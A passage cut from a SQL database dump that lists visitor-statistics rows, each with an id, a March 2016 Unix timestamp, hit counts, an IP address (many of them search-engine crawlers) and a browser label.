70,1,1,0,0,'46.133.249.207','other'),(24443,1458591874,1,1,0,0,'95.111.253.210','firefox'),(24444,1458592116,1,1,0,0,'212.80.58.166','chrome'),(24445,1458592323,1,1,0,0,'62.210.215.100','chrome'),(24446,1458592392,1,0,1,0,'66.249.78.151',''),(24447,1458592569,1,1,0,0,'37.229.125.96','chrome'),(24448,1458593299,1,0,1,0,'66.249.78.158',''),(24449,1458593305,1,1,0,0,'217.69.133.218','other'),(24450,1458593612,1,1,0,0,'217.69.143.60','other'),(24451,1458593767,1,0,1,0,'66.249.78.37',''),(24452,1458594814,1,1,0,0,'52.24.179.58','chrome'),(24453,1458594925,1,1,0,0,'91.196.178.99','chrome'),(24454,1458595097,1,1,0,0,'217.69.136.203','other'),(24455,1458595498,1,1,0,0,'66.249.66.166','other'),(24456,1458595606,1,1,0,0,'207.46.13.118','other'),(24457,1458596157,1,1,0,0,'207.46.13.23','other'),(24458,1458596297,1,1,0,0,'217.69.133.219','other'),(24459,1458596374,1,1,0,0,'217.69.133.245','other'),(24460,1458596375,1,1,0,0,'217.69.133.242','other'),(24461,1458596389,1,1,0,0,'217.69.133.225','other'),(24462,1458596456,1,1,0,0,'217.69.143.50','other'),(24463,1458596536,1,1,0,0,'5.255.253.53','other'),(24464,1458596540,1,1,0,0,'130.193.37.21','other'),(24465,1458596543,1,1,0,0,'141.8.132.99','other'),(24466,1458596546,1,1,0,0,'5.255.253.100','other'),(24467,1458596549,1,1,0,0,'130.193.51.43','other'),(24468,1458596552,1,1,0,0,'141.8.132.2','other'),(24469,1458596667,1,1,0,0,'217.69.133.215','other'),(24470,1458597063,1,1,0,0,'217.69.133.220','other'),(24471,1458597194,1,1,0,0,'66.249.92.95','other'),(24472,1458597329,1,0,1,0,'66.249.78.44',''),(24473,1458597494,1,0,1,0,'68.180.229.235',''),(24474,1458597666,1,0,1,0,'66.249.78.158',''),(24475,1458597906,1,1,0,0,'207.46.13.23','other'),(24476,1458597966,1,0,1,0,'66.249.78.151',''),(24477,1458598714,1,1,0,0,'130.193.51.81','other'),(24478,1458598717,1,1,0,0,'141.8.184.22','other'),(24479,1458598720,1,1,0,0,'5.255.253.110','other'),(24480,1458598724,1,1,0,0,'141.8.142.88','other'),(24481,1458598727,1,1,0,0,'5.255.253.55','other'),(24482,1458598854,1,1,0,0,'51.255.65.16','other'),(24483,1458599510,5,5,0,0,'149.202.54.6','other'),(24484,1458599837,1,1,0,0,'207.46.13.56','other'),(24485,1458599898,1,1,0,0,'66.249.78.158','other'),(24486,1458600220,1,1,0,0,'217.69.133.84','other'),(24487,1458600268,1,1,0,0,'51.255.66.121','other'),(24488,1458600315,1,1,0,0,'8.29.198.25','other'),(24489,1458601020,120,120,0,0,'178.151.143.163','other'),(24490,1458601038,4,4,0,0,'141.8.184.18','other'),(24491,1458601049,1,1,0,0,'178.154.149.11','other'),(24492,1458601138,2,0,2,0,'66.249.78.151',''),(24493,1458601206,1,1,0,0,'66.249.78.158','other'),(24494,1458601422,2,0,2,0,'66.249.78.144',''),(24495,1458601494,1,1,0,0,'66.249.78.37','other'),(24496,1458601676,1,1,0,0,'207.46.13.118','other'),(24497,1458602113,2,0,2,0,'66.249.78.151',''),(24498,1458602160,1,1,0,0,'217.69.143.51','other'),(24499,1458602364,1,1,0,0,'217.69.133.224','other'),(24500,1458603135,4,4,0,0,'66.249.78.144','other'),(24501,1458603208,1,1,0,0,'66.249.78.37','other'),(24502,1458603221,1,1,0,0,'66.249.78.158','other'),(24503,1458603235,1,1,0,0,'66.249.78.151','other'),(24504,1458604306,1,1,0,0,'141.8.183.14','other'),(24505,1458604323,1,1,0,0,'193.201.227.144','firefox'),(24506,1458604567,1,1,0,0,'217.69.133.215','other'),(24507,1458604639,1,1,0,0,'40.77.167.42','other'),(24508,1458604992,1,1,0,0,'207.46.13.118','other'),(24509,1458605314,1,0,1,0,'68.180.229.235',''),(24510,1458605484,1,1,0,0,'207.46.13.23','other'),(24511,1458606005,1,1,0,0,'217.69.133.85','other'),(24512,1458606230,1,0,1,0,'66.249.78.158',''),(24513,1458607060,1,0,1,0,'66.249.78.144',''),(24514,1458607570,2,1,1,0,'66.249.78.144',''),(24515,1458607836,1,1,0,0,'217.69.143.47','other'),(24516,1458607846,1,1,0,0,'207.46.13.138','other'),(24517,1458608108,1,0,1,0,'66.249.78.37',''),(24518,1458608322,1,1,0,0,'66.249.78.158','other'),(24519,1458608403,1,1,0,0,'66.249.92.99','other'),(24520,1458608447,1,1,0,0,'66.249.78.144','other'),(24521,1458608602,1,1,0,0,'164.132.161.94','other'),(24523,1458608891,1,1,0,0,'217.69.143.44','other'),(24524,1458608939,1,0,1,0,'66.249.78.151',''),(24525,1458608975,1,1,0,0,'66.249.78.151','other'),(24526,1458609346,1,1,0,0,'207.46.13.56','other'),(24527,1458609513,1,0,1,0,'68.180.229.235',''),(24528,1458610283,1,1,0,0,'66.249.78.151','other'),(24529,1458610527,1,1,0,0,'66.249.78.158','other'),(24530,1458610703,1,1,0,0,'217.69.143.53','other'),(24531,1458610752,1,0,1,0,'68.180.229.235',''),(24532,1458610833,1,1,0,0,'207.46.13.23','other'),(24533,1458610969,3,3,0,0,'66.249.78.144','other'),(24534,1458610996,1,1,0,0,'177.75.16.71','other'),(24535,1458611085,2,2,0,0,'66.249.66.162','other'),(24536,1458611318,4,4,0,0,'66.249.78.151','other'),(24537,1458611662,2,2,0,0,'66.249.66.158','other'),(24538,1458611956,2,2,0,0,'66.249.78.144','other'),(24539,1458612096,1,1,0,0,'217.69.133.218','other'),(24540,1458612740,3,2,1,0,'66.249.78.158',''),(24541,1458612758,1,1,0,0,'217.69.143.68','other'),(24542,1458612952,1,1,0,0,'8.29.198.26','other'),(24543,1458613006,5,5,0,0,'66.249.78.151','other'),(24544,1458613081,4,4,0,0,'66.249.78.144','other'),(24545,1458613492,1,1,0,0,'66.249.78.158','other'),(24546,1458613605,1,1,0,0,'51.255.66.188','other'),(24547,1458613663,1,1,0,0,'217.69.133.224','other'),(24548,1458613984,1,1,0,0,'66.249.66.162','other'),(24549,1458614162,1,1,0,0,'217.69.133.84','other'),(24550,1458614265,1,1,0,0,'164.132.161.21','other'),(24551,1458614893,1,0,1,0,'68.180.229.235',''),(24552,1458615009,1,0,1,0,'66.249.78.144',''),(24553,1458615030,2,0,2,0,'66.249.78.151',''),(24554,1458615803,1,0,1,0,'66.249.78.158',''),(24555,1458615957,1,1,0,0,'51.255.66.146','other'),(24556,1458616064,1,1,0,0,'51.255.65.22','other'),(24557,1458616747,1,1,0,0,'217.69.133.215','other'),(24558,1458616794,1,1,0,0,'164.132.161.3','other'),(24559,1458616801,1,1,0,0,'37.9.122.201','other'),(24560,1458616805,1,1,0,0,'37.9.122.202','other'),(24561,1458616859,1,1,0,0,'37.9.122.203','other'),(24562,1458617110,1,1,0,0,'164.132.161.59','other'),(24563,1458618227,1,1,0,0,'217.69.133.216','other'),(24564,1458618386,3,3,0,0,'178.154.189.204','other'),(24565,1458618587,1,1,0,0,'164.132.161.53','other'),(24566,1458619383,1,0,1,0,'66.249.78.144',''),(24567,1458619403,1,1,0,0,'178.154.189.204','other'),(24568,1458619407,1,1,0,0,'37.9.122.201','other'),(24569,1458619502,1,1,0,0,'66.249.92.95','other'),(24570,1458619584,1,1,0,0,'217.69.133.216','other'),(24571,1458619728,1,0,1,0,'66.249.66.166',''),(24572,1458619787,1,0,1,0,'66.249.66.162',''),(24573,1458619882,1,0,1,0,'66.249.78.151',''),(24574,1458620200,1,1,0,0,'180.76.15.30','other'),(24575,1458620826,2,0,2,0,'66.249.78.144',''),(24576,1458621217,1,1,0,0,'51.255.65.58','other'),(24577,1458621336,2,0,2,0,'66.249.66.166',''),(24578,1458621386,2,0,2,0,'66.249.78.151',''),(24579,1458621553,1,0,1,0,'68.180.229.235',''),(24580,1458621710,1,1,0,0,'91.236.75.4','firefox'),(24581,1458622072,1,1,0,0,'217.69.133.229','other'),(24582,1458622073,1,1,0,0,'217.69.133.228','other'),(24583,1458622529,1,0,1,0,'68.180.229.235',''),(24584,1458622562,1,0,1,0,'66.249.66.129',''),(24585,1458622602,1,0,1,0,'66.249.66.158',''),(24586,1458622874,1,1,0,0,'217.69.133.216','other'),(24587,1458622875,1,1,0,0,'217.69.133.85','other'),(24588,1458623057,2,0,2,0,'66.249.78.158',''),(24589,1458623139,1,1,0,0,'217.69.133.252','other'),(24590,1458623140,1,1,0,0,'217.69.133.251','other'),(24591,1458623402,1,1,0,0,'164.132.161.30','other'),(24592,1458623428,1,1,0,0,'217.69.143.64','other'),(24593,1458623463,1,0,1,0,'66.249.78.37',''),(24594,1458623844,1,1,0,0,'8.29.198.25','other'),(24595,1458624135,1,1,0,0,'217.69.143.63','other'),(24596,1458624167,23,0,23,0,'66.249.78.144',''),(24597,1458624187,1,0,1,0,'66.249.66.162',''),(24598,1458624192,1,1,0,0,'217.69.133.216','other'),(24599,1458624220,1,0,1,0,'66.249.78.151',''),(24600,1458624258,1,0,1,0,'66.249.69.124',''),(24601,1458624276,7,0,7,0,'66.249.66.158',''),(24602,1458624499,1,1,0,0,'207.46.13.23','other'),(24603,1458624508,1,0,1,0,'66.249.78.30',''),(24604,1458624686,1,0,1,0,'66.249.78.37',''),(24605,1458624806,1,1,0,0,'217.69.133.191','other'),(24606,1458624862,1,1,0,0,'217.69.143.68','other'),(24607,1458624979,1,1,0,0,'91.196.178.69','chrome'),(24608,1458625315,3,0,3,0,'66.249.78.144',''),(24609,1458625365,1,1,0,0,'217.69.133.85','other'),(24610,1458625366,1,1,0,0,'217.69.133.216','other'),(24611,1458625400,1,0,1,0,'66.249.78.44',''),(24612,1458625467,1,1,0,0,'207.46.13.23','other'),(24613,1458625670,1,0,1,0,'66.249.78.151',''),(24614,1458626081,1,1,0,0,'37.54.191.36','chrome'),(24615,1458626220,2,0,2,0,'66.249.78.144',''),(24616,1458626382,2,2,0,0,'207.46.13.23','other'),(24617,1458626837,1,1,0,0,'217.69.133.67','other'),(24618,1458626853,1,0,1,0,'66.249.78.158',''),(24619,1458626898,1,0,1,0,'66.249.78.151',''),(24620,1458627429,3,0,3,0,'66.249.78.144',''),(24621,1458627632,2,2,0,0,'207.46.13.23','other'),(24622,1458627642,1,1,0,0,'217.69.143.54','other'),(24623,1458627668,1,1,0,0,'217.69.143.43','other'),(24624,1458628393,1,1,0,0,'217.69.133.218','other'),(24625,1458628500,1,0,1,0,'66.249.78.144',''),(24626,1458628545,1,0,1,0,'66.249.66.162',''),(24627,1458628730,1,1,0,0,'94.179.26.160','firefox'),(24628,1458628889,3,0,3,0,'66.249.78.158',''),(24629,1458628990,1,0,1,0,'66.249.78.37',''),(24630,1458629113,1,1,0,0,'207.46.13.23','other'),(24631,1458629147,1,0,1,0,'66.249.66.158',''),(24632,1458629160,1,1,0,0,'217.69.133.219','other'),(24633,1458629161,1,1,0,0,'217.69.133.84','other'),(24634,1458629162,1,1,0,0,'217.69.133.216','other'),(24635,1458629210,1,0,1,0,'66.249.78.30',''),(24636,1458629344,1,1,0,0,'66.249.93.94','chrome'),(24637,1458629416,1,1,0,0,'5.83.23.12','chrome'),(24638,1458629516,2,0,2,0,'66.249.78.151',''),(24639,1458629742,1,0,1,0,'66.249.66.133',''),(24640,1458629789,1,1,0,0,'91.196.178.68','firefox'),(24641,1458629822,1,1,0,0,'66.249.92.103','other'),(24642,1458629851,1,1,0,0,'91.196.178.72','chrome'),(24643,1458629885,1,0,1,0,'66.249.66.166',''),(24644,1458629986,1,1,0,0,'164.132.161.71','other'),(24645,1458630062,4,0,4,0,'66.249.78.144',''),(24646,1458630078,1,0,1,0,'66.249.66.162',''),(24647,1458630087,2,2,0,0,'207.46.13.23','other'),(24648,1458630123,1,0,1,0,'66.249.66.158',''),(24649,1458630404,1,1,0,0,'95.135.203.167','chrome'),(24650,1458630683,1,1,0,0,'91.196.178.66','firefox'),(24651,1458630717,1,1,0,0,'94.178.14.67','chrome'),(24652,1458630830,1,1,0,0,'141.8.132.2','other'),(24653,1458630836,1,1,0,0,'51.255.65.91','other'),(24654,1458630842,1,1,0,0,'91.196.178.69','chrome'),(24655,1458631009,1,0,1,0,'66.249.66.166',''),(24656,1458631177,1,1,0,0,'95.111.128.135','chrome'),(24657,1458631220,1,1,0,0,'195.128.139.247','chrome'),(24658,1458631455,1,1,0,0,'91.196.178.66','chrome'),(24659,1458631499,1,0,1,0,'66.249.78.144',''),(24660,1458631631,1,0,1,0,'68.180.229.235',''),(24661,1458631718,3,0,3,0,'66.249.78.151',''),(24662,1458631981,2,2,0,0,'178.95.17.209','chrome'),(24663,1458632090,1,1,0,0,'207.46.13.23','other'),(24664,1458632271,1,1,0,0,'51.255.65.29','other'),(24665,1458632489,3,0,3,0,'66.249.78.144',''),(24666,1458632643,1,1,0,0,'141.8.184.31','other'),(24667,1458632768,1,1,0,0,'195.128.139.247','chrome'),(24668,1458633003,1,0,1,0,'66.249.78.158',''),(24669,1458633072,1,1,0,0,'207.46.13.23','other'),(24670,1458633084,1,1,0,0,'164.132.161.81','other'),(24671,1458633150,1,0,1,0,'66.249.66.162',''),(24672,1458633294,1,1,0,0,'91.196.178.72','firefox'),(24673,1458633330,1,1,0,0,'217.69.133.67','other'),(24674,1458633340,1,1,0,0,'95.135.88.53','chrome'),(24675,1458633467,1,0,1,0,'66.249.78.30',''),(24676,1458633498,2,2,0,0,'66.249.78.151','other'),(24677,1458633519,1,1,0,0,'91.196.178.169','chrome'),(24678,1458633526,1,1,0,0,'178.95.17.209','chrome'),(24679,1458633537,21,21,0,0,'66.249.78.144','other'),(24680,1458633597,2,2,0,0,'5.255.253.51','other'),(24681,1458633687,3,3,0,0,'66.249.66.158','other'),(24682,1458633914,1,1,0,0,'141.8.184.31','other'),(24683,1458633929,1,1,0,0,'141.8.142.60','other'),(24684,1458634112,1,1,0,0,'207.46.13.23','other'),(24685,1458634201,1,1,0,0,'66.249.93.90','chrome'),(24686,1458634242,1,1,0,0,'141.8.132.99','other'),(24687,1458634245,3,3,0,0,'141.8.184.18','other'),(24688,1458634249,2,2,0,0,'178.154.149.11','other'),(24689,1458634608,1,0,1,0,'66.249.78.30',''),(24690,1458634700,1,1,0,0,'217.69.143.45','other'),(24691,1458634709,1,1,0,0,'217.69.143.46','other'),(24692,1458634802,1,1,0,0,'207.46.13.118','other'),(24693,1458634911,1,1,0,0,'8.29.198.25','other'),(24694,1458634923,1,1,0,0,'141.8.183.14','other'),(24695,1458634978,1,1,0,0,'151.80.31.165','other'),(24696,1458635062,1,0,1,0,'66.249.78.151',''),(24697,1458635194,1,1,0,0,'207.46.13.23','other'),(24698,1458635196,2,0,2,0,'68.180.229.235',''),(24699,1458635318,1,1,0,0,'217.69.133.218','other'),(24701,1458635383,1,1,0,0,'94.179.77.216','firefox'),(24702,1458635462,1,1,0,0,'91.196.178.72','firefox'),(24703,1458635720,1,1,0,0,'91.196.178.169','opera'),(24704,1458635814,3,0,3,0,'66.249.78.158',''),(24705,1458635945,1,0,1,0,'66.249.78.144',''),(24706,1458636321,2,0,2,0,'68.180.229.235',''),(24707,1458636391,1,0,1,0,'66.249.78.151',''),(24708,1458636672,1,0,1,0,'66.249.66.158',''),(24709,1458636710,1,1,0,0,'46.211.115.123','chrome'),(24710,1458636872,1,1,0,0,'141.8.184.18','other'),(24711,1458636884,1,0,1,0,'66.249.66.166',''),(24712,1458637000,2,0,2,0,'66.249.78.88',''),(24713,1458637100,1,1,0,0,'151.80.31.106','other'),(24714,1458637488,1,1,0,0,'164.132.161.22','other'),(24715,1458637520,1,0,1,0,'66.249.78.158',''),(24716,1458637714,1,0,1,0,'68.180.229.235',''),(24717,1458637738,2,2,0,0,'94.179.101.193','chrome'),(24718,1458637907,1,1,0,0,'217.69.133.217','other'),(24719,1458637928,1,1,0,0,'141.8.132.44','other'),(24720,1458637973,9,9,0,0,'141.8.184.18','other'),(24721,1458638013,1,1,0,0,'217.69.133.2','other'),(24722,1458638076,2,2,0,0,'130.193.37.21','other'),(24723,1458638126,3,3,0,0,'93.158.152.9','other'),(24724,1458638203,6,6,0,0,'178.154.149.11','other'),(24725,1458638288,1,0,1,0,'66.249.78.81',''),(24726,1458638376,2,0,2,0,'66.249.78.60',''),(24727,1458638432,4,4,0,0,'141.8.183.14','other'),(24728,1458638638,1,1,0,0,'101.226.166.253','chrome'),(24729,1458638941,1,1,0,0,'212.86.104.230','firefox'),(24730,1458638976,1,0,1,0,'66.249.78.151',''),(24731,1458639037,3,0,3,0,'66.249.78.67',''),(24732,1458639283,1,1,0,0,'91.196.178.129','firefox'),(24733,1458639471,1,1,0,0,'217.69.133.85','other'),(24734,1458639522,1,1,0,0,'217.69.136.210','other'),(24735,1458639640,1,1,0,0,'91.196.178.104','chrome'),(24736,1458639958,1,1,0,0,'5.79.68.161','chrome'),(24737,1458640270,1,1,0,0,'217.69.143.45','other'),(24738,1458640375,1,0,1,0,'66.249.78.158',''),(24739,1458640416,1,1,0,0,'151.80.31.163','other'),(24740,1458640446,1,1,0,0,'164.132.161.67','other'),(24741,1458640592,1,1,0,0,'66.249.92.103','other'),(24742,1458641148,1,1,0,0,'178.255.215.95','other'),(24743,1458641208,1,1,0,0,'94.179.191.221','chrome'),(24744,1458641210,1,0,1,0,'66.249.78.144',''),(24745,1458641245,1,1,0,0,'91.196.178.72','firefox'),(24746,1458641265,2,0,2,0,'68.180.229.235',''),(24747,1458641459,1,1,0,0,'51.255.65.51','other'),(24748,1458641625,1,1,0,0,'217.69.143.45','other'),(24749,1458641681,4,4,0,0,'94.154.239.69','other'),(24750,1458641843,1,1,0,0,'217.69.133.10','other'),(24751,1458641844,1,1,0,0,'217.69.133.12','other'),(24752,1458642070,1,1,0,0,'217.69.133.21','other'),(24753,1458642394,1,1,0,0,'217.69.143.49','other'),(24754,1458642414,2,2,0,0,'164.132.161.6','other'),(24755,1458642512,1,0,1,0,'66.249.78.151',''),(24756,1458642633,1,0,1,0,'66.249.78.144',''),(24757,1458642760,1,1,0,0,'5.255.253.53','other'),(24758,1458642763,1,1,0,0,'93.158.152.9','other'),(24759,1458642767,1,1,0,0,'178.154.149.11','other'),(24760,1458642863,1,0,1,0,'66.249.78.158',''),(24761,1458643286,1,1,0,0,'78.111.190.40','firefox'),(24762,1458643395,1,1,0,0,'217.69.133.2','other'),(24763,1458643426,1,1,0,0,'91.196.178.72','firefox'),(24764,1458643430,3,0,3,0,'68.180.229.235',''),(24765,1458643646,1,1,0,0,'91.196.178.98','chrome'),(24766,1458643649,1,1,0,0,'94.179.191.221','chrome'),(24767,1458643721,3,0,3,0,'66.249.78.151',''),(24768,1458643973,1,1,0,0,'217.69.143.68','other'),(24769,1458644068,1,1,0,0,'141.8.142.10','other'),(24770,1458644308,1,1,0,0,'91.196.178.70','chrome'),(24771,1458644668,2,0,2,0,'66.249.78.158',''),(24772,1458645047,1,1,0,0,'94.154.239.69','other'),(24773,1458645083,1,1,0,0,'94.179.208.178','chrome'),(24774,1458645205,1,0,1,0,'66.249.78.37',''),(24775,1458645236,2,0,2,0,'66.249.78.151',''),(24776,1458645253,2,0,2,0,'66.249.78.144',''),(24777,1458645335,2,0,2,0,'66.249.66.158',''),(24778,1458645454,1,1,0,0,'93.171.243.81','chrome'),(24779,1458645546,1,1,0,0,'51.255.65.87','other'),(24780,1458645580,1,0,1,0,'68.180.229.235',''),(24781,1458645735,1,0,1,0,'66.249.66.162',''),(24782,1458645739,5,5,0,0,'144.76.29.66','other'),(24783,1458645937,1,1,0,0,'157.55.39.157','other'),(24784,1458646068,1,1,0,0,'217.69.143.71','other'),(24785,1458646187,1,1,0,0,'157.55.39.76','other'),(24786,1458646268,1,1,0,0,'91.196.179.33','firefox'),(24787,1458646408,1,1,0,0,'8.29.198.26','other'),(24788,1458646688,2,0,2,0,'66.249.78.144',''),(24789,1458646725,2,0,2,0,'66.249.78.151',''),(24790,1458646974,1,1,0,0,'220.181.108.103','other'),(24792,1458647114,1,1,0,0,'141.8.183.14','other'),(24793,1458647158,1,1,0,0,'37.115.120.205','chrome'),(24794,1458647401,1,0,1,0,'66.249.78.37',''),(24795,1458647406,1,1,0,0,'178.154.189.204','other'),(24796,1458647979,1,1,0,0,'74.91.26.114','firefox'),(24797,1458647984,1,1,0,0,'91.196.178.69','chrome'),(24798,1458648488,2,2,0,0,'46.200.239.246','chrome'),(24799,1458648901,1,1,0,0,'217.69.133.219','other'),(24801,1458648917,1,1,0,0,'178.154.149.11','other'),(24802,1458648920,1,0,1,0,'66.249.78.158',''),(24803,1458649062,1,1,0,0,'51.255.65.24','other'),(24804,1458649361,1,1,0,0,'157.55.39.195','other'),(24805,1458649464,1,0,1,0,'66.249.78.144',''),(24806,1458649709,1,1,0,0,'91.196.178.97','chrome'),(24807,1458649849,1,1,0,0,'104.209.188.207','other'),(24808,1458650021,1,1,0,0,'180.76.15.137','other'),(24809,1458650047,1,0,1,0,'66.249.78.151',''),(24810,1458650292,1,1,0,0,'217.69.143.56','other'),(24811,1458650564,1,0,1,0,'66.249.78.144',''),(24812,1458650665,1,1,0,0,'31.172.191.135','msie'),(24813,1458650672,1,0,1,0,'66.249.78.158',''),(24814,1458650728,1,1,0,0,'217.69.133.224','other'),(24815,1458650998,1,1,0,0,'51.255.65.96','other'),(24816,1458651238,2,2,0,0,'82.193.127.15','other'),(24817,1458651340,3,3,0,0,'80.91.162.99','other'),(24818,1458651583,1,1,0,0,'217.69.143.45','other'),(24819,1458651704,3,0,3,0,'66.249.78.144',''),(24820,1458651717,1,1,0,0,'217.69.143.64','other'),(24821,1458651854,2,0,2,0,'66.249.78.151',''),(24822,1458651872,1,1,0,0,'66.249.92.99','other'),(24823,1458651948,2,2,0,0,'217.69.133.219','other'),(24824,1458652101,1,1,0,0,'164.132.161.72','other'),(24825,1458652111,2,2,0,0,'95.132.72.198','chrome'),(24826,1458652118,1,1,0,0,'91.196.178.69','chrome'),(24827,1458652145,4,4,0,0,'91.209.51.22','other'),(24828,1458652194,1,0,1,0,'66.249.78.30',''),(24829,1458652367,1,1,0,0,'91.196.178.70','chrome'),(24830,1458652382,1,1,0,0,'91.196.178.169','chrome'),(24831,1458652673,1,0,1,0,'66.249.78.37',''),(24832,1458652868,1,1,0,0,'164.132.161.58','other'),(24833,1458653196,5,5,0,0,'80.91.162.99','other'),(24834,1458653451,1,1,0,0,'151.80.31.157','other'),(24835,1458653605,1,1,0,0,'217.69.133.85','other'),(24836,1458653653,1,1,0,0,'157.55.39.195','other'),(24837,1458653696,1,1,0,0,'91.196.178.70','chrome'),(24838,1458653764,2,0,2,0,'66.249.78.158',''),(24839,1458654034,1,0,1,0,'66.249.66.162',''),(24840,1458654090,2,0,2,0,'66.249.78.144',''),(24841,1458654220,1,0,1,0,'66.249.78.151',''),(24842,1458654286,2,2,0,0,'37.53.161.209','chrome'),(24843,1458655478,1,1,0,0,'180.76.15.29','other'),(24844,1458655546,1,1,0,0,'91.196.178.69','chrome'),(24845,1458655662,1,1,0,0,'217.69.133.84','other'),(24846,1458655677,1,0,1,0,'68.180.229.235',''),(24847,1458655742,1,1,0,0,'157.55.39.195','other'),(24848,1458655992,1,1,0,0,'217.69.133.67','other'),(24849,1458655993,1,1,0,0,'217.69.133.215','other'),(24850,1458656051,1,1,0,0,'94.179.26.160','firefox'),(24851,1458656131,2,0,2,0,'66.249.78.158',''),(24852,1458656255,2,0,2,0,'66.249.78.144',''),(24853,1458656259,1,1,0,0,'46.173.175.153','opera'),(24854,1458656647,1,1,0,0,'91.196.178.72','firefox'),(24855,1458656669,1,1,0,0,'51.255.65.33','other'),(24856,1458657026,1,1,0,0,'217.69.133.221','other'),(24857,1458657088,1,1,0,0,'95.132.89.218','opera'),(24858,1458657238,1,1,0,0,'217.69.143.69','other'),(24859,1458657259,3,0,3,0,'66.249.78.151',''),(24860,1458657485,1,0,1,0,'66.249.78.30',''),(24861,1458657607,1,1,0,0,'177.75.16.71','other'),(24862,1458657755,1,0,1,0,'66.249.66.158',''),(24863,1458657791,1,1,0,0,'94.179.101.193','chrome'),(24864,1458657963,2,2,0,0,'157.55.39.195','other'),(24865,1458658092,1,1,0,0,'8.29.198.26','other'),(24866,1458658218,4,0,4,0,'66.249.78.144',''),(24867,1458658265,1,1,0,0,'178.93.148.214','chrome'),(24868,1458658342,1,0,1,0,'66.249.78.151',''),(24869,1458658385,1,1,0,0,'157.55.39.76','other'),(24870,1458658387,5,5,0,0,'94.154.239.69','other'),(24871,1458658391,1,1,0,0,'51.255.65.76','other'),(24872,1458658725,1,0,1,0,'66.249.78.158',''),(24873,1458659076,1,0,1,0,'68.180.229.235',''),(24874,1458659184,1,1,0,0,'217.69.133.217','other'),(24875,1458659378,1,1,0,0,'91.236.75.4','firefox'),(24876,1458659635,1,1,0,0,'91.196.178.69','chrome'),(24877,1458660014,1,1,0,0,'151.80.31.103','other'),(24878,1458660044,1,1,0,0,'51.255.65.81','other'),(24879,1458660396,1,1,0,0,'180.76.15.5','other'),(24880,1458660592,1,1,0,0,'178.154.189.204','other'),(24881,1458660882,1,1,0,0,'66.249.66.162','other'),(24882,1458660958,1,0,1,0,'66.249.78.144',''),(24883,1458660978,4,4,0,0,'80.91.162.99','other'),(24884,1458661167,1,1,0,0,'37.9.122.203','other'),(24885,1458661649,1,1,0,0,'157.55.39.157','other'),(24886,1458661758,1,1,0,0,'180.76.15.160','other'),(24887,1458661933,1,1,0,0,'217.69.133.226','other'),(24888,1458661934,1,1,0,0,'217.69.133.222','other'),(24889,1458662639,1,0,1,0,'66.249.78.151',''),(24890,1458662700,1,1,0,0,'83.233.207.74','other'),(24891,1458662798,1,1,0,0,'217.69.143.55','other'),(24892,1458662883,1,1,0,0,'66.249.92.99','other'),(24893,1458663027,1,0,1,0,'66.249.78.144',''),(24894,1458663131,1,1,0,0,'66.249.78.144','other'),(24895,1458663788,1,0,1,0,'66.249.66.162',''),(24896,1458663895,1,1,0,0,'46.164.155.92','chrome'),(24897,1458663900,1,0,1,0,'68.180.229.173',''),(24898,1458663952,1,1,0,0,'91.196.178.72','firefox'),(24899,1458664117,1,1,0,0,'51.255.65.72','other'),(24900,1458664148,1,1,0,0,'51.255.65.14','other'),(24901,1458664178,1,1,0,0,'164.132.161.36','other'),(24902,1458664390,1,1,0,0,'217.69.143.64','other'),(24903,1458664450,1,0,1,0,'66.249.78.37',''),(24904,1458664871,1,1,0,0,'91.196.178.166','chrome'),(24905,1458664934,2,1,1,0,'66.249.78.144',''),(24906,1458665023,1,0,1,0,'66.249.78.151',''),(24907,1458665069,1,1,0,0,'51.255.65.26','other'),(24908,1458665655,1,1,0,0,'164.132.161.55','other'),(24909,1458665693,2,0,2,0,'66.249.78.158',''),(24910,1458666500,1,1,0,0,'177.75.16.71','other'),(24911,1458666728,1,1,0,0,'66.249.66.158','other'),(24912,1458666845,1,1,0,0,'217.69.143.51','other'),(24913,1458667144,1,1,0,0,'217.69.143.56','other'),(24915,1458667149,1,0,1,0,'66.249.78.158',''),(24916,1458667194,2,2,0,0,'66.249.78.144','other'),(24917,1458667352,2,2,0,0,'66.249.78.151','other'),(24918,1458667966,1,1,0,0,'95.132.74.146','chrome'),(24919,1458668295,3,3,0,0,'66.249.78.151','other'),(24920,1458668340,1,0,1,0,'66.249.66.129',''),(24921,1458668392,1,1,0,0,'91.196.178.167','firefox'),(24922,1458668401,1,1,0,0,'217.69.143.67','other'),(24923,1458668513,2,2,0,0,'66.249.78.144','other'),(24924,1458668776,1,1,0,0,'51.255.65.14','other'),(24925,1458668958,1,1,0,0,'217.69.133.216','other'),(24926,1458669130,2,2,0,0,'141.8.184.11','other'),(24927,1458669134,1,1,0,0,'141.8.184.31','other'),(24928,1458669137,1,1,0,0,'5.255.253.53','other'),(24929,1458669198,5,2,3,0,'66.249.78.151',''),(24930,1458669439,1,1,0,0,'180.76.15.150','other'),(24931,1458669511,1,1,0,0,'180.76.15.5','other'),(24932,1458669523,1,1,0,0,'8.29.198.26','other'),(24933,1458669545,2,0,2,0,'66.249.78.144',''),(24934,1458669619,7,7,0,0,'66.249.78.144','other'),(24935,1458669837,1,1,0,0,'151.80.31.171','other'),(24936,1458669968,1,1,0,0,'217.69.143.70','other'),(24938,1458669969,1,1,0,0,'217.69.143.66','other'),(24939,1458670144,1,1,0,0,'66.249.78.151','other'),(24940,1458670158,3,3,0,0,'66.249.66.158','other'),(24941,1458670234,2,1,1,0,'66.249.66.162',''),(24942,1458670246,1,1,0,0,'217.69.133.218','other'),(24943,1458670536,3,3,0,0,'66.249.78.144','other'),(24944,1458670579,1,1,0,0,'157.55.39.157','other'),(24945,1458670722,1,1,0,0,'217.69.133.67','other'),(24946,1458671216,2,0,2,0,'66.249.78.151',''),(24947,1458671444,4,2,2,0,'66.249.78.144',''),(24948,1458672277,2,0,2,0,'66.249.78.151',''),(24949,1458672287,1,1,0,0,'217.69.133.28','other'),(24950,1458672315,1,1,0,0,'151.80.31.102','other'),(24951,1458672428,2,1,1,0,'66.249.66.158',''),(24952,1458672493,2,0,2,0,'66.249.78.144',''),(24953,1458672602,1,1,0,0,'66.249.66.158','other'),(24954,1458672743,1,1,0,0,'37.54.16.165','chrome'),(24955,1458673399,1,1,0,0,'66.249.78.158','other'),(24956,1458673629,1,1,0,0,'51.255.65.89','other'),(24957,1458673820,1,1,0,0,'217.69.143.50','other'),(24958,1458673924,1,1,0,0,'66.249.92.103','other'),(24959,1458673925,1,1,0,0,'207.46.13.56','other'),(24960,1458674052,1,1,0,0,'217.69.133.217','other'),(24961,1458674053,1,1,0,0,'217.69.133.85','other'),(24963,1458674184,1,1,0,0,'217.69.143.64','other'),(24964,1458674333,1,1,0,0,'180.76.15.157','other'),(24965,1458674357,2,0,2,0,'66.249.78.144',''),(24966,1458674458,3,1,